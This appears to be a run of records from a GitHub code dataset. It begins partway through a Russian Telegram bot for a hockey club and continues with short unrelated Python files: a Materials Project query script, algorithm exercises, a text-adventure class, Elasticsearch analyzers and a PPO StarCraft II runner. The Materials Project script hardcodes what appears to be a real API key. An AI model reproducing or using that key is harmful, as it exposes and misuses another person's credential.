{game_date_time}\nУже записались:\n \n'''\n message2 = '''\n\nПередумали и отказались:\n\n'''\n counter1 = 0\n counter2 = 0\n for user in users_data:\n name = user.get('name')\n user_birthday = user.get('birthday').strftime(\"%d.%m\")\n now = datetime.now()\n then = now + timedelta(days = 1)\n birthday = ''\n if user_birthday == now.strftime(\"%d.%m\"):\n birthday = '(Сегодня день рождения🥳)'\n if user_birthday == then.strftime(\"%d.%m\"):\n birthday = '(Завтра день рождения🥳)'\n if user.get('newbie'):\n newbie = 'Новичок'\n else:\n newbie = ''\n if user.get('changed'):\n counter2 += 1\n message2 += f'❌ {counter2}) {name} {birthday} {newbie}\\n'\n else:\n counter1 += 1\n message1 += f'✅ {counter1}) {name} {birthday} {newbie}\\n'\n\n\n message = message1 + message2\n try:\n await msg.answer(message)\n except Exception as e:\n if str(e) == 'Message is too long':\n parts = split_message(message, max_length=4096)\n for part in parts:\n await msg.answer(part)\n\n@dp.message_handler(is_media_group=False,\n content_types=['text', 'audio', 'document', 'sticker', 'photo', \n 'video', 'voice', 'contact', 'location'])\nasync def dialog_handler(msg: types.Message):\n if msg.from_user.id == ADM_ID or msg.from_user.id == DEV_ID:\n if msg.text == 'Оценки тренировок 📊':\n message = '''\nЗа какой день хотите посмотреть тренировку?\n'''\n select_date_button = types.InlineKeyboardButton('Указать дату', callback_data='select_date_button')\n yesterday_training_button = types.InlineKeyboardButton('За вчерашний', callback_data='yesterday_training_button')\n keyboard = types.InlineKeyboardMarkup().row(select_date_button, yesterday_training_button)\n await msg.answer(message, reply_markup=keyboard)\n elif msg.text == 'Запись на тренировку 🏒':\n trainings_data = await dj.get_training_info()\n if not trainings_data:\n await msg.answer('Тренеровок пока нет')\n return\n elif trainings_data == 'not today':\n await msg.answer('На сегодня тренировок нет или ещё никто не записался.')\n return\n if len(trainings_data) == 1:\n await show_users_training(msg, trainings_data[0].get('id'))\n return\n message = 'Выберите тренировку\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for training in trainings_data:\n id = training.get('id')\n time = training.get('time').strftime('%H:%M')\n address = training.get('address')\n place = training.get('place')\n if training.get('day') == 'friday':\n training_type = '( *игровая тренировка* )'\n else:\n training_type = '( *тренировка* )'\n button = types.InlineKeyboardButton(f'{count}) {time}', callback_data=f'select_current_training_{id}')\n keyboard.add(button)\n message += f'''{count})\n🕖Лёд в {time}{training_type} \n🏟Стадион: {place} \n{address}\n\n'''\n count += 1\n await msg.answer(message, reply_markup=keyboard)\n elif msg.text == 'Запись на игру 🎮':\n games_data = await dj.check_games_admin()\n if not games_data:\n await msg.answer('Игры ещё не объявлены')\n return\n \n message = 'Выберите игру\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for game in games_data:\n date_time = game.get('date_time')\n place = game.get('place')\n team = game.get('team')\n id = game.get('id')\n data_time = date_time.strftime('%d.%m.%Y %H:%M')\n message += f'{count}) {place} {team} {data_time}\\n'\n button = types.InlineKeyboardButton(f'{count}) {place}', callback_data=f'admin_select_game_{id}')\n keyboard.add(button)\n count += 1\n await msg.answer(message, reply_markup=keyboard)\n elif msg.text == 'Рупор 📢':\n await msg.answer('Напишите сообщения для всех игроков. (Сообщение может содержать текст и одну картинку)')\n await Adm_State.megaphone.set()\n else:\n await send_dialogue_message(msg)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('select_current_training_'))\nasync def show_selected_training(call: types.CallbackQuery):\n await call.message.delete()\n training_id = call.data.split('_')[3]\n await show_users_training(call.message, training_id)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('admin_select_game'))\nasync def select_game_admin(call: types.CallbackQuery):\n await call.message.delete()\n game_id = call.data.split('_')[3]\n users_data = await dj.get_game_users_admin(game_id)\n await show_users_game(users_data, call.message)\n\n\n@dp.message_handler(state=Adm_State.megaphone, content_types=['text', 'photo'])\nasync def save_message_to_state(msg: types.Message, state: FSMContext):\n if msg.content_type == 'text':\n await state.update_data(text=msg.text, photo=None)\n if msg.content_type == 'photo':\n await state.update_data(text=msg.caption, photo=msg.photo[-1].file_id)\n cancel_megaphone_button = types.InlineKeyboardButton('Отмена', callback_data='cancel_megaphone_button')\n send_megaphone_button = types.InlineKeyboardButton('Отправить', callback_data='send_megaphone_button')\n keyboard = types.InlineKeyboardMarkup().row(cancel_megaphone_button, send_megaphone_button)\n await msg.answer('''\nОтправить?\n\nВнимание. Можно отправить только одно сообщение - последнее из написаных.\nЕсли Вы хотите отправить другое, то просто напишите новое сообщение.\n''', reply_markup=keyboard)\n\n@dp.callback_query_handler(lambda call: call.data == 'cancel_megaphone_button', state=Adm_State.megaphone)\nasync def cancel_megaphone(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await call.message.answer('Отправка отменена.')\n await state.finish()\n\n@dp.callback_query_handler(lambda call: call.data == 'send_megaphone_button', state=Adm_State.megaphone)\nasync def send_megaphone(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n users_ids = await dj.get_users_ids()\n state_data = await state.get_data()\n state_text = state_data.get('text')\n state_photo = state_data.get('photo')\n for_del = await call.message.answer('📩 Рассылаю...')\n for id in users_ids:\n try:\n if state_photo:\n await bot.send_photo(chat_id=id, photo=state_photo, caption=state_text)\n else:\n await bot.send_message(chat_id=id, text=state_text)\n except Exception as e:\n print(e)\n await bot.delete_message(chat_id=call.message.chat.id, message_id=for_del.message_id)\n await call.message.answer('Сообщение отправлено.')\n await state.finish()\n\n@dp.message_handler(is_media_group=True, content_types=['audio', 'document', 'photo', 'video'])\nasync def dialog_handler_media(msg: types.Message, album: List[types.Message]):\n if msg.from_user.id == ADM_ID:\n await send_dialogue_message_with_media(msg,album)\n\nasync def show_rates_for_training(rates_data, training_data, msg):\n date = training_data.get('date')\n time = training_data.get('time')\n place = training_data.get('place')\n address = training_data.get('address')\n date_time = datetime.combine(date, time)\n date_time = date_time.strftime('%d.%m.%Y %H:%M')\n message = f'''Оценки за вчершанюю тренировку:\n{date_time} \n{place}\n{address}\n\n\n'''\n for user in rates_data.get('users'):\n name = user.get('name')\n rate = user.get('rate')\n message += f'{name} - {rate}\\n'\n average_score = rates_data.get('average_score')\n message += f'\\nСредняя оценка тренировки - {average_score}'\n await msg.answer(message)\n\n#показать оценки за вчершании тренирровки\n@dp.callback_query_handler(lambda call: call.data == 'yesterday_training_button')\nasync def get_yesterday_rates(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n rated_trainings = await dj.get_rated_trainings()\n if not rated_trainings:\n await call.message.answer('Вчера тренировок не было.')\n return\n if len(rated_trainings) == 1:\n rates_data = await dj.get_training_rates(rated_trainings[0])\n await show_rates_for_training(rates_data, rated_trainings[0], call.message)\n else:\n message = 'Выберите тренировку\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for training in rated_trainings:\n date = training.get('date')\n time = training.get('time')\n place = training.get('place')\n address = training.get('address')\n id = training.get('id')\n date_time = datetime.combine(date, time)\n date_time = date_time.strftime('%d.%m.%Y %H:%M')\n message += f'''{count})\n{date_time} \n{place}\n{address}\\n\\n'''\n button = types.InlineKeyboardButton(f'{count}) {place}', callback_data=f'select_rated_training_{id}')\n keyboard.add(button)\n count += 1\n await call.message.answer(message, reply_markup=keyboard)\n await state.update_data(trainings=rated_trainings)\n\n\n@dp.callback_query_handler(lambda call: call.data.startswith('select_rated_training_'))\nasync def show_selected_training(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n training_id = call.data.split('_')[3]\n state_data = await state.get_data()\n trainings = state_data.get('trainings')\n for training in trainings:\n if training.get('id') == int(training_id):\n rates_data = await dj.get_training_rates(training)\n await show_rates_for_training(rates_data, training, call.message)\n await state.finish()\n break\n\n#показать оценки за тренировку по выбранной дате\n@dp.callback_query_handler(lambda call: call.data == 'select_date_button')\nasync def get_rates_by_date(call: types.CallbackQuery):\n await call.message.delete()\n cancel_training_date_button = types.InlineKeyboardButton('Отмена', callback_data='cancel_training_date_button')\n keyboard = types.InlineKeyboardMarkup().add(cancel_training_date_button)\n await call.message.answer('Напишите дату тренировки в формате: 01.01.1970',\n reply_markup=keyboard)\n await Adm_State.training_date.set()\n\n@dp.callback_query_handler(lambda call: call.data == 'cancel_training_date_button',\n state=Adm_State.training_date)\nasync def cancel_training_date(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await call.message.answer('Действие отменено.')\n await state.finish()\n\n\n@dp.message_handler(state=Adm_State.training_date)\nasync def get_rates_by_date(msg: types.Message, state: FSMContext):\n regex = r\"\\d{2}\\.\\d{2}\\.\\d{4}\"\n if not re.search(regex, msg.text):\n cancel_training_date_button = types.InlineKeyboardButton('Отмена', callback_data='cancel_training_date_button')\n keyboard = types.InlineKeyboardMarkup().add(cancel_training_date_button)\n await msg.answer('Неверный формат даты. Повторите ввод.', reply_markup=keyboard)\n return\n training_date = datetime.strptime(msg.text, \"%d.%m.%Y\")\n rated_trainings = await dj.get_rated_trainings(training_date)\n if not rated_trainings:\n await msg.answer('В этот день тренировок не было.')\n await state.finish()\n return\n if len(rated_trainings) == 1:\n rates_data = await dj.get_training_rates(rated_trainings[0])\n await show_rates_for_training(rates_data, rated_trainings[0], msg)\n else:\n message = 'Выберите тренировку\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for training in rated_trainings:\n date = training.get('date')\n time = training.get('time')\n place = training.get('place')\n address = training.get('address')\n id = training.get('id')\n date_time = datetime.combine(date, time)\n date_time = date_time.strftime('%d.%m.%Y %H:%M')\n message += f'''{count})\n{date_time} \n{place}\n{address}\\n\\n'''\n button = types.InlineKeyboardButton(f'{count}) {place}', callback_data=f'select_rated_training_{id}')\n keyboard.add(button)\n count += 1\n await msg.answer(message, reply_markup=keyboard)\n await state.finish()\n await state.update_data(trainings=rated_trainings)\n\n\n#вход для существующих пользователей\n@dp.callback_query_handler(lambda call: call.data == 'sign_in_button')\nasync def sign_in(call: types.CallbackQuery):\n await call.message.delete()\n message = '''\nПожалуйста укажите Ваш номер телефона для идентификации.\nВ формате: 89000000000(числа подряд)'''\n await call.message.answer(message)\n await StartState.phone_number_sign_in.set()\n\n#идентификация существующих пользователей по номеру теле��она\n@dp.message_handler(state=StartState.phone_number_sign_in)\nasync def get_tel_number(msg: types.Message, state: FSMContext):\n if msg.text.isdigit() and len(msg.text) == 11:\n user_name = await dj.identification_by_tel_number(msg.from_user.id, msg.text)\n if not user_name:\n main_menu_button = types.InlineKeyboardButton('В главное меню', callback_data='main_menu_button')\n keyboard = types.InlineKeyboardMarkup().add(main_menu_button)\n await msg.answer('''🚫 Извините, пользователя с этим номером телефона нет в базе данных.\nВозможно Вы записаны под другим номером телефона.\n\nВы можете:\n- Обратиться к тренеру (команда /dialogue).\n- Повторить вввод\n- Вернуться в главное меню и выполнить регистрацию''', reply_markup=keyboard)\n \n return\n await msg.answer(f'{user_name}, рады Вас приветствовать. Совсем скоро я уведомлю Вас о предстоящей тренировке!')\n await state.finish()\n return\n await msg.answer('Вы неверно ввели номер телефона. Должно быть 11 цифр. Пожалуйста повторите попытку.')\n return\n\n#возврат в главное меню при неудачной попытки войти\n@dp.callback_query_handler(lambda call: call.data == 'main_menu_button', state=StartState.phone_number_sign_in)\nasync def back_to_start(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await main_menu_message(call.message)\n await state.finish()\n\n#клавиатура отмены регистрации\ndef cancel_reg_keyboard():\n cancel_reg_button = types.InlineKeyboardButton('Отмена', callback_data='cancel_reg_button')\n keyboard = types.InlineKeyboardMarkup().add(cancel_reg_button)\n return keyboard\n\n#регистрация новых пользователей\n@dp.callback_query_handler(lambda call: call.data == 'sign_up_button')\nasync def sign_up(call: types.CallbackQuery):\n await call.message.delete()\n message = '''\nДавайте знакомится. Напишите пожалуйста Ваши ФИО.'''\n\n await call.message.answer(message, reply_markup=cancel_reg_keyboard())\n await StartState.name.set()\n\n#отмена при записи имени\n@dp.callback_query_handler(lambda call: call.data == 'cancel_reg_button', state=StartState.name)\nasync def cancel_name(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await state.finish()\n await main_menu_message(call.message)\n\n#запись имени в State\n@dp.message_handler(state=StartState.name)\nasync def get_name(msg: types.Message, state: FSMContext):\n await state.update_data(name=msg.text)\n await msg.answer('''Принято. Теперь укажите Ваш номер телефона.\nВ формате: 89000000000(числа подряд)''', \n reply_markup=cancel_reg_keyboard())\n await StartState.phone_number_sign_up.set()\n\n#отмена при записи номера телефона\n@dp.callback_query_handler(lambda call: call.data == 'cancel_reg_button', state=StartState.phone_number_sign_up)\nasync def cancel_name(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await state.finish()\n await main_menu_message(call.message)\n\n#запись номера телефона в State\n@dp.message_handler(state=StartState.phone_number_sign_up)\nasync def get_tel_number(msg: types.Message, state: FSMContext):\n if msg.text.isdigit() and len(msg.text) == 11:\n await state.update_data(phone_number_sign_up=msg.text)\n await msg.answer('''И последний вопрос. Когда у Вас день рождения?\nУкажите в формате: 01.01.1970''', reply_markup=cancel_reg_keyboard())\n await StartState.birthday.set()\n else:\n await msg.answer('Вы неверно ввели номер телефона. Должно быть 11 цифр. Пожалуйста повторите попытку.',\n reply_markup=cancel_reg_keyboard())\n\n#отмена при записи дня рождения\n@dp.callback_query_handler(state=StartState.birthday)\nasync def cancel_birthday(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n await state.finish()\n await main_menu_message(call.message)\n\n#получение дня рождения и запись всех полученных данных в бд с галочкой \"новичок\"\n@dp.message_handler(state=StartState.birthday)\nasync def get_birthday(msg: types.Message, state: FSMContext):\n regex = r\"\\d{2}\\.\\d{2}\\.\\d{4}\"\n if not re.search(regex, msg.text):\n await msg.answer('Неверный формат даты. Повторите ввод.', reply_markup=cancel_reg_keyboard())\n return\n state_data = await state.get_data()\n name = state_data.get('name')\n phone_number = state_data.get('phone_number_sign_up')\n date_object = datetime.strptime(msg.text, \"%d.%m.%Y\")\n birthday = date_object.strftime(\"%Y-%m-%d\")\n user_id = msg.from_user.id\n await dj.add_new_user(name, phone_number, birthday, user_id)\n await msg.answer(f'''\nФИО: {name}\nНомер телефона: {phone_number}\nДень рождения: {msg.text}\n\nРегистрация прошла успешно. Рады приветствовать!\nВы всегда можете изменить свои данные с помощью команды /my_profile\nСовсем скоро я сообщу Вам место и время проведения Вашей первой тренировки в нашем клубе.''')\n await state.finish()\n\n#запись на занятие\n@dp.callback_query_handler(lambda call: call.data.startswith('accept_button'))\nasync def first_accept(call: types.CallbackQuery):\n today = datetime.today().date()\n training_id = call.data.split('_')[2]\n training_data_first = await dj.get_training_data_for_accept(today, training_id, call.from_user.id)\n # для тестов\n # test_date_time = \"2023-11-17 22:00:00\"\n # now = datetime.strptime(test_date_time, \"%Y-%m-%d %H:%M:%S\")\n now = datetime.now()\n if now >= training_data_first:\n await call.message.delete()\n await call.message.answer('Запись на занятие окончена. Обратитесь к тренеру.')\n return\n await call.message.delete()\n training_data_second = await dj.accept_training(today, training_id, call.from_user.id)\n training_date_time = training_data_second.get('date_time')\n training_place = training_data_second.get('place')\n training_address = training_data_second.get('address')\n \n url = training_data_second.get('route')\n message = f'''\nЗапись прошла успешно! ✅\n\nЖдём Вас {training_date_time}.\nАдрес: {training_place}, {training_address}\n\nПостроить маршрут'''\n await call.message.answer(message, disable_web_page_preview=True)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('declain_button'))\nasync def declain(call: types.CallbackQuery):\n today = datetime.today().date()\n training_id = call.data.split('_')[2]\n training_data_first = await dj.get_training_data_for_accept(today, training_id, call.from_user.id)\n\n now = datetime.now()\n if now >= training_data_first:\n await call.message.delete()\n await call.message.answer('Запись на занятие окончена. Ждём Вас снова!')\n return\n await call.message.delete()\n\n\n await dj.declain_training(today, training_id, call.from_user.id)\n await call.message.answer('❌ Тренировка отклонена. Ждём Вас в следующий раз!')\n\n\n#оценка тренировки\n@dp.callback_query_handler(lambda call: call.data and call.data.startswith('rate_button'))\nasync def get_rate(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n data = call.data.split('_')\n rate = data[2]\n training_id = data[3]\n await dj.set_rate(rate, training_id)\n await call.message.answer('Спасибо за оценку!')\n\n\n\n\n#запись на игру\n@dp.callback_query_handler(lambda call: call.data.startswith('accept_game_button'))\nasync def first_accept(call: types.CallbackQuery):\n await call.message.delete()\n game_id = call.data.split('_')[3]\n game_data = await dj.get_game_data_for_accept(game_id, call.from_user.id)\n\n now = datetime.now().replace(microsecond=0)\n game_datetime = game_data.get('datetime')\n if now >= game_datetime:\n await call.message.answer('Запись на игру окончена. Обратитесь к тренеру.')\n return\n \n is_accept = await dj.accept_game(game_id, call.from_user.id)\n if not is_accept:\n await call.message.answer('Пока игр нет')\n return\n \n url = game_data.get('route')\n address = game_data.get('address')\n place = game_data.get('place')\n game_datetime = game_datetime.strftime(\"%d.%m.%Y %H:%M\")\n message = f'''\nЗапись прошла успешно! ✅\n\n{game_datetime} - ждём Вас на игру.\nАдрес: {place}, {address}\n\nПостроить маршрут'''\n await call.message.answer(message, disable_web_page_preview=True)\n\n\n@dp.callback_query_handler(lambda call: call.data.startswith('declain_game_button'))\nasync def declain(call: types.CallbackQuery):\n game_id = call.data.split('_')[3]\n is_accept = await dj.declain_game(game_id, call.from_user.id)\n if not is_accept:\n await call.message.answer('Пока игр нет')\n return\n await call.message.delete()\n await call.message.answer('❌ Игра отклонена. Ждём Вас в следующий раз!')","repo_name":"Shoichii/hockey_bot","sub_path":"bot/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":38460,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"38520359416","text":"from mp_api.client import MPRester\nimport pandas as pd\n\ndef DataRetrieval(chemsys):\n fields = ['formula_pretty','formation_energy_per_atom','energy_above_hull']\n with MPRester(\"NUNc2qkYfekFR1DkxzhKvBCAMVAgOLoF\") as mpr:\n docs = mpr.summary.search(chemsys=chemsys, fields=fields)\n df = pd.DataFrame(columns=fields)\n for row in range(len(docs)):\n df.at[row, 'formula_pretty'] = docs[row].formula_pretty\n df.at[row, 'formation_energy_per_atom'] = docs[row].formation_energy_per_atom\n df.at[row, 'energy_above_hull'] = docs[row].energy_above_hull\n row += 1\n return df\n","repo_name":"joshua142857/matsci","sub_path":"RHEAs_phase_prediction-main/testmaterialsproject.py","file_name":"testmaterialsproject.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"33534299318","text":"\n# Given a binary tree t and an integer s, determine whether there is a root to leaf path in t such that the sum of vertex values equals s.\n\n#\n# Binary trees are already defined with this interface:\n# class Tree(object):\n# def __init__(self, x):\n# self.value = x\n# self.left = None\n# self.right = None\ndef hasPathWithGivenSum(t, s):\n if not t: return False\n nodesToTraverse = [(t, 0)]\n while nodesToTraverse:\n currNode = nodesToTraverse.pop()\n node, currVal = currNode[0], currNode[1]\n currVal += node.value\n if currVal == s and not node.left and not node.right:\n return True\n if node.left: nodesToTraverse.append((node.left, currVal))\n if node.right: nodesToTraverse.append((node.right, currVal))\n return False\n","repo_name":"AnthonyTsui/AlgoPractice","sub_path":"CodeSignal/Binary Trees/hasPathWithGivenSum.py","file_name":"hasPathWithGivenSum.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"12161259314","text":"# Write a class to hold player information, e.g. what room they are in\n# currently.\n\nclass Player:\n def __init__(self, name, current_room):\n self.name = name\n self.current_room = current_room\n self.inventory = []\n self.gold = 0\n self.atk = 0\n self.hp = 10\n self.status = \"alive\"\n\n\n def move(self, direction):\n attribute = direction + '_to'\n\n if hasattr(self.current_room, attribute):\n self.current_room = getattr(self.current_room, attribute)\n else:\n print(\"you may not go in that direction!\\n\")\n\n def check_room_for_item(self, name):\n for i in self.current_room.contents:\n if i.name == name:\n return i\n return None\n\n def check_inventory_for_item(self, name):\n for i in self.inventory:\n if i.name == name:\n return i\n return None\n\n def print_info(self):\n output = f\"\\n[{self.name}]\\nStatus: {self.status}\\nHealth: {self.hp}\\nAttack: {self.atk}\\nGold: {self.gold}\\n\\n[Inventory]\\n\"\n\n if len(self.inventory) > 0:\n for i in self.inventory:\n output += f\"{i.name}: {i.description}\\n\"\n output += \"\\n\"\n else:\n output += \"Your Sack is Empty!\\n\"\n\n \n print(output)","repo_name":"decagondev/CS_41_long","sub_path":"adv/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"32706387261","text":"# !usr/bin/env python\n# -*- coding:utf-8 _*-\n# author:chenmeng\n# datetime:2020/5/7 21:00\n'''\nsolution1: 暴力的动态规划\nsolution2: 带有备忘录的动态规划,在备忘录中存储每一个计算过的总钱数需要的硬币数,那么在遍历的过程中就会省去重复计算。\nsolution3: 动态转移矩阵的动态规划。\nsolution4: dfs。将硬币从大到小排序,从最大的硬币开始,先用尽量大的硬币数量,使总金额减去硬币金额尽量小,然后在使用小金额进行相同的操作,\n同时记录在凑满总金额时用的最少的硬币个数。\n'''\nimport math\nclass Solution:\n # 暴力解法,超时\n def coinChange_1(self, coins, amount):\n\n def dp(n):\n if n == 0: return 0\n if n < 0: return -1\n res = float('inf')\n for coin in coins:\n sub = dp(n - coin)\n if sub == -1: continue\n res = min(res, 1 + sub)\n return res if res != float('inf') else -1\n\n return dp(amount)\n\n def coinChange_2(self, coins, amount):\n memo = {}\n\n def dp(n):\n if n in memo: return memo[n]\n if n == 0: return 0\n if n < 0: return -1\n res = float('inf')\n for coin in coins:\n sub = dp(n - coin)\n if sub == -1: continue\n res = min(res, sub + 1)\n memo[n] = res if res != float('inf') else -1\n return memo[n]\n\n return dp(amount)\n\n def coinChange_3(self, coins, amount):\n # 因为对于amount,最大的硬币数就是amount个了,所以这里设置初始值为amount+1,相当于一个没有意义的数。\n dp = [amount + 1 for _ in range(amount + 1)]\n dp[0] = 0\n for i in range(1, len(dp)):\n for coin in coins:\n if i - coin < 0: continue\n dp[i] = min(dp[i], dp[i - coin] + 1)\n return -1 if dp[amount] == amount + 1 else dp[amount]\n\n def coinChange_4(self, coins, amount):\n n = len(coins)\n # 使硬币金额倒叙,从最大的开始\n coins = sorted(coins, reverse=True)\n res = amount + 1\n\n def dfs(index, target, count):\n nonlocal res\n this_coin = coins[index]\n # 如果当前的硬币来凑剩余的target的数量加上之前累积的硬币数count大于等于之前的解res,那么舍去这种方法\n # math.ceil()是向上取整,例如10/3=4\n if count + math.ceil(target / this_coin) >= res:\n return\n # 如果剩余的target能够整除当前的硬币金额,那么记录下当前解\n if target % this_coin == 0:\n res = count + target // this_coin\n # 如果当前的index已经是最后一个了,那么后边就不需要再去计算了,说明所有的硬币都凑过了,但是没凑全\n if index == n - 1:\n return\n # 这里就是一个dfs搜索,先用最大的硬币来凑,然后逐次递减硬币的金额,如果当前硬币金额大于target,那么target//this_coin=0,也就是使用0个当前硬币\n for i in range(target // this_coin, -1, -1):\n dfs(index + 1, target - i * this_coin, count + i)\n\n dfs(0, amount, 0)\n return -1 if res == amount + 1 else res\n\n\n\nif __name__ == '__main__':\n solution = Solution()\n coins = [1, 2, 5]\n amount = 11\n print(solution.coinChange_4(coins, amount))\n","repo_name":"KevinChen1994/leetcode-algorithm","sub_path":"top100/322.py","file_name":"322.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"35683447919","text":"from elasticsearch_dsl import analyzer, token_filter\n\nfrom course_discovery.settings.process_synonyms import get_synonym_lines_from_file\n\n__all__ = ('html_strip', 'synonym_text', 'edge_ngram_completion', 'case_insensitive_keyword',)\n\nhtml_strip = analyzer(\n 'html_strip', tokenizer='standard', filter=['lowercase', 'stop', 'snowball'], char_filter=['html_strip']\n)\n\nsynonym_tokenfilter = token_filter('synonym_tokenfilter', 'synonym', synonyms=get_synonym_lines_from_file())\n\nsynonym_text = analyzer(\n 'synonym_text',\n tokenizer='standard',\n filter=[\n # The ORDER is important here.\n 'lowercase',\n synonym_tokenfilter,\n # Note! 'snowball' comes after 'synonym_tokenfilter'\n 'snowball',\n ],\n char_filter=['html_strip'],\n)\n\nedge_ngram_completion_filter = token_filter(\n 'edge_ngram_completion_filter',\n type=\"edge_ngram\",\n min_gram=2,\n max_gram=22\n)\n\n\nedge_ngram_completion = analyzer(\n \"edge_ngram_completion\",\n tokenizer=\"standard\",\n filter=[\"lowercase\", edge_ngram_completion_filter]\n)\n\ncase_insensitive_keyword = analyzer(\n \"case_insensitive_keyword\",\n tokenizer=\"keyword\",\n filter=[\"lowercase\"]\n)\n","repo_name":"openedx/course-discovery","sub_path":"course_discovery/apps/course_metadata/search_indexes/documents/analyzers.py","file_name":"analyzers.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"30"} +{"seq_id":"42614246212","text":"#!/usr/bin/python3\nimport sys\nif (__name__ == \"__main__\"):\n argv = sys.argv\n i = 1\n if (len(argv) == 1):\n print(\"0 arguments.\")\n elif (len(argv) == 2):\n print(\"1 argument:\\n1: {:s}\".format(argv[1]))\n else:\n print(\"{:d} arguments:\".format(len(argv) - 1))\n while (i < len(argv)):\n print(\"{:d}: {:s}\".format((i), argv[i]))\n i += 1\n","repo_name":"sagudecod97/holbertonschool-higher_level_programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"33923103763","text":"from ppo.runner import Runner\nfrom ppo.model import Model\nfrom ppo.policies import PolicyFullyConnected\nfrom common.env_wrapper import EnvWrapper\nfrom pysc2.env.sc2_env import SC2Env\nfrom pysc2.lib.features import Dimensions\nfrom pysc2.lib.features import AgentInterfaceFormat\nfrom common.utilities import global_seed\nimport argparse\nimport numpy as np\nimport sys\nimport absl.flags\nabsl.flags.FLAGS(sys.argv)\n\n\ndef run():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--timesteps', default=int(1e6))\n parser.add_argument('--num_steps', default=128)\n parser.add_argument('--entropy_coefficient', default=0.01)\n parser.add_argument('--learning_rate', default=2e-4)\n parser.add_argument('--gae_gamma', default=0.99)\n parser.add_argument('--gae_lambda', default=0.95)\n parser.add_argument('--num_batches', default=4)\n parser.add_argument('--num_training_epochs', default=4)\n parser.add_argument('--clip_range', default=0.2)\n parser.add_argument('--summary_frequency', default=20000)\n parser.add_argument('--performance_num_episodes', default=10)\n parser.add_argument('--summary_log_dir', default=\"ppo_fc\")\n args = parser.parse_args()\n\n dimensions = Dimensions(screen=(32, 32), minimap=(1, 1))\n interface_format = AgentInterfaceFormat(\n feature_dimensions=dimensions,\n use_feature_units=True,\n )\n\n global_seed(0)\n batch_size = args.num_steps // args.num_batches\n env = SC2Env(map_name=\"MoveToBeacon\",\n agent_interface_format=interface_format,\n step_mul=8,\n random_seed=1\n )\n\n env = EnvWrapper(env)\n\n model = Model(\n policy=PolicyFullyConnected,\n observation_space=env.observation_space,\n action_space=env.action_space,\n learning_rate=args.learning_rate,\n spatial_resolution=(5, 5),\n clip_range=args.clip_range,\n entropy_coefficient=args.entropy_coefficient\n )\n\n runner = Runner(env=env,\n model=model,\n num_steps=args.num_steps,\n advantage_estimator_gamma=args.gae_gamma,\n advantage_estimator_lambda=args.gae_lambda,\n summary_frequency=args.summary_frequency,\n performance_num_episodes=args.performance_num_episodes,\n summary_log_dir=args.summary_log_dir)\n\n for _ in range(0, (args.timesteps // args.num_steps) + 1):\n assert args.num_steps % args.num_batches == 0\n step = runner.run()\n observations = np.asarray(step[0])\n actions = np.asarray(step[1])\n available_actions = np.asarray(step[2])\n actions_spatial = np.asarray(step[3])\n actions_spatial_mask = np.asarray(step[4])\n advantage_estimations = np.asarray(step[5])\n values = np.asarray(step[6])\n probs = np.asarray(step[7])\n probs_spatial = np.asarray(step[8])\n indexes = np.arange(args.num_steps)\n\n for _ in range(args.num_training_epochs):\n np.random.shuffle(indexes)\n\n for i in range(0, args.num_steps, batch_size):\n shuffled_indexes = indexes[i:i + batch_size]\n model.train(observations=\n [observations[0][shuffled_indexes],\n observations[1][shuffled_indexes],\n observations[2][shuffled_indexes]\n ],\n actions=actions[shuffled_indexes],\n available_actions_mask=available_actions[shuffled_indexes],\n actions_spatial=actions_spatial[shuffled_indexes],\n actions_spatial_mask=actions_spatial_mask[shuffled_indexes],\n advantages=advantage_estimations[shuffled_indexes],\n values=values[shuffled_indexes],\n probs=probs[shuffled_indexes],\n probs_spatial=probs_spatial[shuffled_indexes]\n )\n\n\ndef main():\n run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"saschaschramm/MoveToBeacon","sub_path":"ppo/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"36139647707","text":"from copy import deepcopy\nfrom django.contrib import admin\nfrom mezzanine.pages.admin import PageAdmin\nfrom models import HomePage, Services, About\n\n#ABOUT ADMIN\nabout_extra_fieldsets = ((None, {\"fields\": (\"headertext\", \"bodytext\",)}),)\nclass AboutAdmin(PageAdmin):\n fieldsets = deepcopy(PageAdmin.fieldsets) + about_extra_fieldsets\n\n#HOMEPAGE ADMIN\nhomepage_extra_fieldsets = ((None, {\"fields\": (\"headerone\",\"headertwo\",\n \"coloneheader\", 